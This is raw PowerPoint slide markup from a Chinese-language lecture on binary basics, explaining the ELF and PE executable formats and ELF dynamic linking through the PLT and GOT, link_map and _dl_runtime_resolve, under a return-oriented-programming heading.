            <a:endParaRPr sz="1867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marL="1219170" lvl="1" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern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"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>提供动态链接相关信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern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Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609585" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>link_map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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marL="1219170" lvl="1" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern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"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>保存进程载入的动态链接库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>链表</a:t>
            </a:r>
            <a:endParaRPr b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609585" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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dl_runtime_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867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marL="1219170" lvl="1" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern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"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>装载器中用于解析动态链接库中函数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>实际地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern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"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>的函数</a:t>
            </a:r>
            <a:endParaRPr kern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Arial"/>
              <a:sym typeface="Arial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2AD29D2B-1C97-4DAF-A588-2CE42B37FD7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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9564047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Shape 838"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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39" name="Shape 839"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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840" name="Shape 840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6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841" name="Shape 841"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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842" name="Shape 842"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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43" name="Shape 843"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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44" name="Shape 844"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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845" name="Shape 845"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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846" name="Shape 846"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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847" name="Shape 847"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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848" name="Shape 848"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="849" name="Shape 849"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="840" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F779353E-A0A7-437E-A134-B72A780FA783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="26052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调用 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libc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中的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foo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函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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C4A9BAEC-F32B-4914-B17B-F649B0E298D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 855"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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56" name="Shape 856"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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857" name="Shape 857"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6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858" name="Shape 858"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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859" name="Shape 859"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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60" name="Shape 860"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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61" name="Shape 861"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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862" name="Shape 862"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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863" name="Shape 863"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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864" name="Shape 864"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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865" name="Shape 865"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="866" name="Shape 866"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="867" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA00084-DE0A-40EA-8523-36C89568360D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="20553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进程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首次调用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foo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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B5EEA441-78D2-44A8-A795-4C9EBEA86B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 873"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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74" name="Shape 874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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875" name="Shape 875"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867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876" name="Shape 876"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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877" name="Shape 877"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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78" name="Shape 878"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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79" name="Shape 879"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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880" name="Shape 880"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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881" name="Shape 881"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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882" name="Shape 882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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883" name="Shape 883"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="884" name="Shape 884"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="885" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA794344-267D-4FE0-8DF1-A45841250A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633313" y="4865168"/>
            <a:ext cx="499367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跳转到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plt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中的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foo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表项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plt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中的代码立即跳转到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got.plt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中记录的地址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E78DB2A8-5EDD-46D0-94BA-4BF4BE48C016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614063" y="2541113"/>
            <a:ext cx="2954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什么是可执行文件？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5C167BE-6CF8-47B7-BDF6-E128CAF75988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254623" y="3070530"/>
            <a:ext cx="462819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广义：文件中的数据是可执行代码的文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.out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、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.exe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、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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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、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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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CN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狭义：文件中的数据是机器码的文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.out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、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.exe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、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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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dll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、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.so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DA3F7BE-97E2-45EB-96FD-D6038C425E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1382015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可执行文件的分类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C635983-05CE-49B3-B85F-BFC62741F972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6736560" y="1911432"/>
            <a:ext cx="5194051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Windows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：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PE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（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Portable Executable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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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可执行程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.exe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动态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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静态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.lib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altLang="zh-CN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Linux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：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C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ELF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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Executable and Linkable Format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）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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可执行程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.out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动态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.so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静态链接库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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.a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13665858-6BB1-40D6-8FDA-C57B57CF3B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| Linux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下的可执行文件格式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ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267818065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Shape 892"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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93" name="Shape 893"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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894" name="Shape 894"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6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895" name="Shape 895"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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896" name="Shape 896"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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97" name="Shape 897"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="2033033"/>
            <a:ext cx="2248400" cy="13960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push *(GOT+4)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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98" name="Shape 898"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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899" name="Shape 899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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900" name="Shape 900"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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901" name="Shape 901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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902" name="Shape 902"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="903" name="Shape 903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="904" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032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5" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1790191-4AB8-4659-9DB0-E65588BCFEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5749224" y="4865168"/>
            <a:ext cx="424186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由于进程是第一次调用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foo</a:t>
            </a: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故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got.plt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中记录的地址是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foo@plt+1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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B2AB2D06-2237-4AB7-8E49-2509A066979F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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Shape 911"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400" y="2033033"/>
            <a:ext cx="2248400" cy="13960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endParaRPr sz="1867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endParaRPr sz="1867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call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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12" name="Shape 912"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4210500"/>
            <a:ext cx="2095200" cy="4096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printf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913" name="Shape 913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="4620100"/>
            <a:ext cx="2095200" cy="4096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foo@plt+6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914" name="Shape 914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5029700"/>
            <a:ext cx="2095200" cy="4096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bar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915" name="Shape 915"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="2033033"/>
            <a:ext cx="2248400" cy="13960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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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algn="ctr" defTabSz="1219170">
              <a:buClr>
